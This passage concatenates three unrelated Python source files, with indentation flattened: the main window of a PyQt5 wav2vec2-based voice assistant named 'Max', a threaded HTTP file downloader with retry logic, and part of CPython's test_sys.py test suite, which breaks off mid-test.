from utils.dynamicPyQt5Labels import ImageChangingLabel, ImageBackgroundChangingLabel
from utils.framelessDialogs import FramelessMessageDialog, FramelessScrollableMessageDialog
from utils.framelessDialogs import FramelessSettingsDialog
CHUNK = 1024
SAMPLE_FORMAT = pyaudio.paInt16
CHANNELS = 1
SAMPLE_RATE = 16000
NUMPY_DATATYPE = np.int16
class RootWindow(QMainWindow):
""" This class is the main window of our application. It creates and calls an
inference object Wave2Vec2Inference which uses a pretrained model to achieve
automatic speech recognition."""
def __init__(self, model_name):
super(RootWindow, self).__init__()
self.splash = QSplashScreen(QPixmap('./resources/images/icon.ico'))
self.splash.show()
self.WIDTH = 1024
self.HEIGHT = 576
self.app_name = "SimpleDigitalAssistant"
self.settings = {}
self.mousePressPos = None
self.mouseMovePos = None
self.listening_for_max = False
self.recording = False
self.should_take_action = True
self.p = None
self.stream = None
self.buffer = []
self.np_buffer = None
self.threads = []
self.action_thread = None
self.recording_thread = None
self.listening_for_max_thread = None
self.asr_print_thread = None
self.transcribed_text = ""
self.model_name = model_name
self.wav2vec_inference = Wave2Vec2Inference(self.model_name)
# self.wav2vec_inference = Wave2Vec2Inference(self.model_name, lm_path=r"C:\Users\HannanKhan\Downloads\4-gram-librispeech.bin")
self.speech = QtTextToSpeech.QTextToSpeech()
self.action = Action(self.speech)
self.setFixedWidth(self.WIDTH)
self.setFixedHeight(self.HEIGHT)
# opens the window in the middle of the screen.
self.qtRectangle = self.frameGeometry()
self.centerPoint = QDesktopWidget().availableGeometry().center()
self.qtRectangle.moveCenter(self.centerPoint)
self.move(self.qtRectangle.topLeft())
# create a Frameless window
self.setWindowFlags(Qt.FramelessWindowHint)
# add the window icon
self.setWindowIcon(QtGui.QIcon("resources/images/icon.ico"))
# create a font database, and load the custom Lato-Thin font
self.font_database = QFontDatabase()
self.lato_font_id = self.font_database.addApplicationFont("resources/fonts/Lato-Light.ttf")
self.lato_font_family = self.font_database.applicationFontFamilies(self.lato_font_id).__getitem__(0)
self.current_font = QFont(self.lato_font_family, 15)
# create a main frame for overall layout
self.main_frame = QFrame()
self.main_frame_stylesheet = """
QFrame {background-color: rgb(255, 232, 214)}
"""
self.main_frame.setStyleSheet(self.main_frame_stylesheet)
self.main_frame_layout = QVBoxLayout()
self.main_frame_layout.setSpacing(0)
self.main_frame_layout.setContentsMargins(0, 0, 0, 0)
self.main_frame_layout.setAlignment(Qt.AlignTop)
self._init_settings()
self._init_colors()
self._init_sound_devices()
self._init_bottom_main_frame()
self._init_window_frame()
# self._start_action_thread()
self.main_frame_layout.addWidget(self.bottom_main_frame)
self.main_frame.setLayout(self.main_frame_layout)
self.setCentralWidget(self.main_frame)
self.show()
self.splash.close()
self.speech.say("Hello, I'm Max.")
self.start_listening_for_max_thread()
def _init_bottom_main_frame(self) -> None:
self.bottom_main_frame = QFrame()
self.bottom_main_frame_layout = QHBoxLayout()
self.bottom_main_frame_layout.setSpacing(50)
self.bottom_main_frame_layout.setContentsMargins(10, 70, 40, 10)
self.bottom_main_frame_layout.setAlignment(Qt.AlignLeft)
self.bottom_left_main_frame = QFrame()
self.bottom_left_main_frame_layout = QVBoxLayout()
self.bottom_left_main_frame_layout.setSpacing(50)
self.bottom_left_main_frame_layout.setContentsMargins(10, 10, 0, 10)
self.bottom_left_main_frame_layout.setAlignment(Qt.AlignCenter)
self.welcome_label = QLabel()
self.welcome_label.setFont(QFont(self.lato_font_family, 20))
self.welcome_label.setStyleSheet("""
QLabel { rgb (88, 105, 126); }
""")
self.welcome_label.setWordWrap(True)
self.welcome_label.setText("Welcome to your digital assistant, MAX!")
self.output_label = QtWidgets.QTextEdit()
self.output_label.setReadOnly(True)
self.output_label.setFont(QFont(self.lato_font_family, 10))
self.output_label.setTextInteractionFlags(Qt.NoTextInteraction)
self.output_label.setCursor(QCursor(Qt.ArrowCursor))
self.mic_label = ImageChangingLabel("resources/images/mic_normal_icon.png",
"resources/images/mic_highlight_icon.png", self._start_recording_thread,
350, 350)
self.bottom_left_main_frame_layout.addWidget(self.welcome_label)
self.bottom_left_main_frame_layout.addWidget(self.output_label)
self.bottom_left_main_frame.setLayout(self.bottom_left_main_frame_layout)
self.bottom_main_frame_layout.addWidget(self.bottom_left_main_frame)
self.bottom_main_frame_layout.addWidget(self.mic_label)
self.bottom_main_frame.setLayout(self.bottom_main_frame_layout)
def _init_sound_devices(self) -> None:
if self.p:
self.p.terminate()
self.p = pyaudio.PyAudio()
self.input_device_dict = pyaudio.PyAudio.get_default_input_device_info(self.p)
self.input_device_idx = self.input_device_dict['index']
self.input_device_name = self.input_device_dict["name"]
# max input channels is 1
self.input_channels = self.input_device_dict['maxInputChannels']
# default sampleRate is 44100
self.default_sample_rate = self.input_device_dict['defaultSampleRate']
self.output_device_dict = pyaudio.PyAudio.get_default_output_device_info(self.p)
self.output_device_num = self.output_device_dict['index']
self.output_device_name = self.output_device_dict["name"]
if self.stream:
self.stream.stop_stream()
self.stream.close()
self.stream = self.p.open(rate=SAMPLE_RATE, channels=CHANNELS, format=SAMPLE_FORMAT,
frames_per_buffer=CHUNK, input=True)
def mousePressEvent(self, a0: QtGui.QMouseEvent) -> None:
self.mousePressPos = None
self.mouseMovePos = None
if (a0.button() == Qt.LeftButton) and self.window_frame.underMouse():
self.mousePressPos = a0.globalPos()
self.mouseMovePos = a0.globalPos()
super(RootWindow, self).mousePressEvent(a0)
def mouseMoveEvent(self, a0: QtGui.QMouseEvent) -> None:
if (a0.buttons() == Qt.LeftButton) and (self.window_frame.underMouse()):
curr_pos = self.pos()
global_pos = a0.globalPos()
diff = global_pos - self.mouseMovePos
new_pos = curr_pos + diff
self.move(new_pos)
self.mouseMovePos = global_pos
super(RootWindow, self).mouseMoveEvent(a0)
def mouseReleaseEvent(self, a0: QtGui.QMouseEvent) -> None:
super(RootWindow, self).mouseReleaseEvent(a0)
def _init_settings(self) -> None:
if os.path.exists("settings.json"):
with open("settings.json", 'r') as settings_file:
self.settings = json.load(settings_file)
else:
with open("settings.json", "w") as settings_file:
json.dump(self.settings, settings_file)
def _init_colors(self) -> None:
# Champagne Pink
self.normal_bg = QtGui.QColor()
self.normal_bg.setRgb(255, 232, 214)
# Macaroni and Cheese
self.highlight_bg = QtGui.QColor()
self.highlight_bg.setRgb(255, 186, 133)
# Dark Electric Blue
self.normal_color = QtGui.QColor()
self.normal_color.setRgb(88, 105, 126)
# Cadet Grey
self.highlight_color = QtGui.QColor()
self.highlight_color.setRgb(141, 157, 175)
# Grey (american silver) color for minimize button
self.minimize_button_label_highlight_bg = QtGui.QColor()
self.minimize_button_label_highlight_bg.setRgb(229, 229, 229)
# Red Color for close button
self.close_button_label_highlight_bg = QtGui.QColor()
self.close_button_label_highlight_bg.setRgb(255, 87, 51)
# White color (champagne flute) for close button when highlighted
self.close_button_label_highlight_color = QtGui.QColor()
self.close_button_label_highlight_color.setRgb(246, 234, 226)
def _init_window_frame(self) -> None:
self.window_frame = QtWidgets.QFrame()
self.window_frame.setFixedHeight(60)
""" Window_frame will have two sub frames, one for the left half, includes the
icon and name, and one for the right half, includes the close and minimize
buttons."""
self.window_frame_layout = QtWidgets.QHBoxLayout()
self.window_frame_layout.setSpacing(0)
self.window_frame_layout.setContentsMargins(0, 0, 0, 0)
self.window_frame_left = QtWidgets.QFrame()
self.window_frame_right = QtWidgets.QFrame()
self.wf_left_layout = QtWidgets.QHBoxLayout()
self.wf_left_layout.setSpacing(0)
self.wf_left_layout.setContentsMargins(8, 0, 0, 0)
self.wf_left_layout.setAlignment(Qt.AlignLeft)
self.wf_right_layout = QtWidgets.QHBoxLayout()
self.wf_right_layout.setSpacing(0)
self.wf_right_layout.setContentsMargins(0, 0, 0, 0)
self.wf_right_layout.setAlignment(Qt.AlignRight)
self.app_name_label = CustomButton(self.about, self.normal_bg, self.minimize_button_label_highlight_bg,
self.normal_color, self.highlight_color)
self.app_name_label.setToolTip("About")
self.app_name_label.setText(self.app_name)
self.app_name_label.setFont(QFont(self.lato_font_family, 11))
self.wf_left_layout.addWidget(self.app_name_label)
self.settings_button_label = ImageBackgroundChangingLabel(self.normal_bg,
self.minimize_button_label_highlight_bg,
"resources/images/settings_normal_icon.png",
"resources/images/settings_highlight_icon.png",
self.settings_dialog, 30, 60)
self.settings_button_label.setToolTip("Settings")
self.settings_button_label.setContentsMargins(0, 0, 5, 0)
self.wf_right_layout.addWidget(self.settings_button_label)
self.minimize_button_label = CustomButton(self.minimize_app, self.normal_bg,
self.minimize_button_label_highlight_bg, self.normal_color,
self.highlight_color)
self.minimize_button_label.setToolTip("Minimize")
self.minimize_button_label.setText(" _ ")
self.minimize_button_label.setFont(QFont(self.lato_font_family, 10))
self.wf_right_layout.addWidget(self.minimize_button_label)
self.close_button_label = CustomButton(self.clean_exit_app, self.normal_bg,
self.close_button_label_highlight_bg,
self.normal_color, self.close_button_label_highlight_color)
self.close_button_label.setToolTip("Close")
self.close_button_label.setText(" / ")
self.close_button_label.setFont(QFont(self.lato_font_family, 10))
self.wf_right_layout.addWidget(self.close_button_label)
self.window_frame_left.setLayout(self.wf_left_layout)
self.window_frame_right.setLayout(self.wf_right_layout)
self.window_frame_layout.addWidget(self.window_frame_left)
self.window_frame_layout.addWidget(self.window_frame_right)
self.window_frame.setLayout(self.window_frame_layout)
self.main_frame_layout.addWidget(self.window_frame)
def _start_action_thread(self):
""" Starts the thread that waits for commands to be transcribed so it can
take action based on the command."""
self.action_thread = threading.Thread(target=self._take_action)
self.action_thread.setDaemon(True)
self.action_thread.setName("action_thread")
self.threads.append(self.action_thread)
self.action_thread.start()
def _take_action(self):
while self.should_take_action:
time.sleep(0.5)
if self.transcribed_text:
if self.transcribed_text == "exit":
self._dirty_exit_app()
self.action.take_action(command=self.transcribed_text)
self.transcribed_text = ""
return
def start_listening_for_max_thread(self):
""" Starts a thread to open a stream and listen for the hotword 'max'.
When the keyword is detected, the start_recording_thread function will be
called."""
self._update_threads()
self.listening_for_max_thread = threading.Thread(target=self._listen_for_max)
self.listening_for_max_thread.setDaemon(True)
self.listening_for_max_thread.setName("listen_for_max_thread")
self.threads.append(self.listening_for_max_thread)
self.listening_for_max_thread.start()
def _listen_for_max(self):
self.buffer = []
self.listening_for_max = True
# data is of class 'bytes' and needs to converted into a numpy array.
while self.listening_for_max:
if self.recording:
return
data = self.stream.read(1024)
self.buffer.append(data)
if len(self.buffer) > 10:
self.buffer = self.buffer[-10:]
transcribed_txt = self._transcribe_buffer_audio()
if "max" in transcribed_txt:
# Ready == 0
# Speaking == 1
# Paused == 2
# BackEnd Error == 3
if self.speech.state() == 1:
self.speech.stop()
# self._play_recorded_buffer_audio()
# self.output_label.append(transcribed_txt)
self._start_recording_thread()
self.listening_for_max = False
return
def start_asr_thread(self) -> None:
""" Starts a thread to open a stream (via realTimeAudio.LiveWave2Vec2)
and keep transcribing voice until a keyboard interrupt."""
self.asr_print_thread = threading.Thread(target=self._start_asr_printing)
self.asr_print_thread.setDaemon(True)
self.asr_print_thread.setName("Recording Thread")
self.threads.append(self.asr_print_thread)
self.asr_print_thread.start()
def _start_asr_printing(self) -> None:
try:
while True:
text, sample_length, inference_time = self.asr.get_last_text()
self.output_label.append(text)
self.output_label.moveCursor(QtGui.QTextCursor.End)
print(f"{sample_length:.3f}s\t{inference_time:.3f}s\t{text}")
except KeyboardInterrupt:
self.asr.stop()
def _start_recording_thread(self) -> None:
""" Called by the mic label. Starts a thread that opens a pyaudio stream,
records audio until the mic label is pressed again. After the recording has been
stopped, the audio buffer is transcribed via the Wave2VecInference model,
the stream is closed, and the output text is printed.
There is an option to play the recorded voice back out loud to you (just in case
for debugging). Simply uncomment the appropriate line in self.get_voice_command."""
self._update_threads()
self.mic_label.invert_active_state()
self.recording_thread = threading.Thread(target=self.get_voice_command)
self.recording_thread.setDaemon(True)
self.recording_thread.setName("recording_thread")
self.threads.append(self.recording_thread)
self.recording_thread.start()
# print("threads: ", self.threads)
def get_voice_command(self) -> None:
if self.recording:
QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))
self.recording = False
self._transcribe_and_print_buffer_audio()
self.action.take_action(self.transcribed_text)
# self._play_recorded_buffer_audio()
QApplication.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.mic_label.invert_active_state()
self.start_listening_for_max_thread()
return
self.buffer = []
self.recording = True
# data is of class 'bytes' and needs to converted into a numpy array.
while self.recording:
data = self.stream.read(1024)
self.buffer.append(data)
if len(self.buffer) > 30:
# if the last 15 frames are silence, end the command.
if self._transcribe_custom_length_buffer_audio(self.buffer[-15:]) == "":
self.get_voice_command()
return
def _get_np_buffer(self) -> None:
"""Sets the numpy buffer by converting the bytes object into a numpy array.
The numpy buffer can then be used for inference.
We are dividing by 32767 because this operation will convert the buffer into
a float array (required by the pytorch model). This number is arbitrary and
controls the amplitude of the audio (dividing by small numbers results in an
increase in amplitude (loudness), large numbers result in decrease in amplitude
(not audible to human ear at 500000)). The transcription is not phased by the
amplitude. Simply converting the buffer to float results in as loud amplitude
as dividing by 1.0."""
self.np_buffer = np.frombuffer(b''.join(self.buffer), dtype=NUMPY_DATATYPE) / 32767
def _play_recorded_buffer_audio(self) -> None:
""" Debugging function, used to get the buffer, and play it back out loud.
Also prints the buffer, and its relevant information."""
self._get_np_buffer()
print("np_buffer: ", self.np_buffer, "| len:", len(self.np_buffer), "| size in memory (bytes)",
(self.np_buffer.size * self.np_buffer.itemsize))
sd.play(self.np_buffer, SAMPLE_RATE)
def _transcribe_buffer_audio(self) -> str:
""" Converts the current buffer into numpy array and gets a transcription from
the currently loaded model."""
self._get_np_buffer()
return self.wav2vec_inference.buffer_to_text(self.np_buffer).lower()
def _transcribe_custom_length_buffer_audio(self, buffer) -> str:
numpy_buffer = np.frombuffer(b''.join(buffer), dtype=NUMPY_DATATYPE) / 32767
return self.wav2vec_inference.buffer_to_text(numpy_buffer).lower()
def _transcribe_and_print_buffer_audio(self) -> None:
""" Transcribes audio based on the given model."""
self.transcribed_text = self._transcribe_buffer_audio()
if self.transcribed_text:
self.output_label.append(self.transcribed_text)
else:
self.output_label.append("Please try again.")
self.output_label.moveCursor(QtGui.QTextCursor.End)
def _update_threads(self):
""" Cleans up the list of threads by joining and deleting old, stopped threads."""
if self.threads:
for idx, thread in enumerate(self.threads):
if not thread.is_alive():
thread.join()
del self.threads[idx]
def about(self) -> None:
"""This function takes care of the about dialog."""
about_dialog = FramelessMessageDialog(self,
"Created by Hannan Khan, Salman Nazir,\nReza Mohideen, and Ali "
"Abdul-Hameed.",
self.normal_bg, self.minimize_button_label_highlight_bg,
self.normal_color,
self.highlight_color, self.close_button_label_highlight_bg,
self.close_button_label_highlight_color, "About",
QFont(self.lato_font_family, 15))
github_label = QtWidgets.QLabel()
github_label.setFont(self.current_font)
github_label.setText(
'<a href="https://github.com/hannankhan888/SimpleDigitalAssistant" style="color: rgba(187, 172, 193, '
'255)">Github</a>')
github_label.setOpenExternalLinks(True)
license_label = CustomButton(self.license, self.normal_bg, self.minimize_button_label_highlight_bg,
self.normal_color, self.highlight_color)
license_label.setFont(self.current_font)
license_label.setText("License")
license_label.setCursor(Qt.PointingHandCursor)
about_dialog.middle_frame_layout.addWidget(github_label)
about_dialog.middle_frame_layout.addWidget(license_label)
about_dialog.exec_()
def settings_dialog(self) -> None:
# we have to stop the listening for max thread as it is using the self.stream obj.
self.listening_for_max = False
self._update_threads()
settings_dialog = FramelessSettingsDialog(self, "", self.normal_bg,
self.minimize_button_label_highlight_bg,
self.normal_color, self.highlight_color,
self.close_button_label_highlight_bg,
self.close_button_label_highlight_color,
"Settings", QFont(self.lato_font_family, 12),
self.input_device_name, self.output_device_name)
result = settings_dialog.exec_()
# Ready == 0
# Speaking == 1
# Paused == 2
# BackEnd Error == 3
if self.speech.state() == 1:
self.speech.stop()
self._init_sound_devices()
# start up listen for max thread again, since we closed it in init sound devices
self.start_listening_for_max_thread()
def license(self) -> None:
""" This function makes a scrollable license dialog."""
license_str = """
MIT License
Copyright (c) 2021 Hannan, Salman, Reza, Ali
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE."""
license_dialog = FramelessScrollableMessageDialog(self, license_str, self.normal_bg,
self.minimize_button_label_highlight_bg,
self.normal_color, self.highlight_color,
self.close_button_label_highlight_bg,
self.close_button_label_highlight_color, "License",
QFont(self.lato_font_family, 12))
license_dialog.exec_()
def minimize_app(self) -> None:
self.showMinimized()
def _set_vars_to_false(self):
""" Sets all vars that run threads to false."""
self.recording = False
self.listening_for_max = False
self.should_take_action = False
def _close_connections(self):
""" Closes all connections started by this app."""
self.stream.stop_stream()
self.stream.close()
self.p.terminate()
def _dirty_exit_app(self):
""" Exits the app in a dirty way. This function is called from the background
action_thread. It uses a global variable QApplication to cause the whole
application to quit at once. This means the threads are not joined in a proper
manner, and cannot be, since a sub-thread is called this function."""
self._set_vars_to_false()
self._close_connections()
QApplication.quit()
def clean_exit_app(self) -> None:
""" Cleanly exits the app by setting all vars to false (thereby stopping all threads),
joining all threads that are not stopped yet. Then closing all connections opened
by this app before exiting."""
self._set_vars_to_false()
for thread in self.threads:
thread.join()
self._close_connections()
sys.exit(0)
def main():
app = QApplication(sys.argv)
desktop = app.desktop()
gui = RootWindow(model_name="jonatasgrosman/wav2vec2-large-english")
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
downloader.py
|
import logging, requests, requests.adapters, queue, threading, os, random, time
def download_retry(requests_session, url, retry_num=1, max_retries=5):
try:
return requests_session.get(url).content
except Exception:
logging.exception("Exception downloading from url {}".format(url))
if max_retries is None:
raise
elif retry_num > max_retries:
logging.info("attempt {} failed, giving up".format(retry_num))
raise
else:
sleep_time = random.choice(range(20,50))
logging.info("attempt {} failed, sleeping {} seconds and retrying".format(retry_num, sleep_time))
time.sleep(sleep_time)
return download_retry(requests_session, url, retry_num+1)
def start_downloader(poolsize, numthreads, worker=None, max_retries=None):
session = requests.session()
session.mount("http://", requests.adapters.HTTPAdapter(pool_connections=poolsize, pool_maxsize=poolsize))
session.mount("https://", requests.adapters.HTTPAdapter(pool_connections=poolsize, pool_maxsize=poolsize))
q = queue.Queue()
threads = []
def thread_worker():
while True:
item = q.get()
if item is None:
break
# if worker callback is provided, it must return True to override the default functionality
if not worker or not worker(item, session):
url, filepath = item
if not os.path.exists(filepath):
logging.info("Downloading {} -> {}".format(url, filepath))
os.makedirs(os.path.dirname(filepath), exist_ok=True)
with open(filepath, "wb") as f:
content = download_retry(session, url, max_retries=max_retries)
f.write(content)
q.task_done()
for i in range(numthreads):
t = threading.Thread(target=thread_worker)
t.start()
threads.append(t)
return q, threads
def stop_downloader(worker_queue, threads, numthreads):
# block until all tasks are done
worker_queue.join()
# stop workers
for i in range(numthreads):
worker_queue.put(None)
for t in threads:
t.join()
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
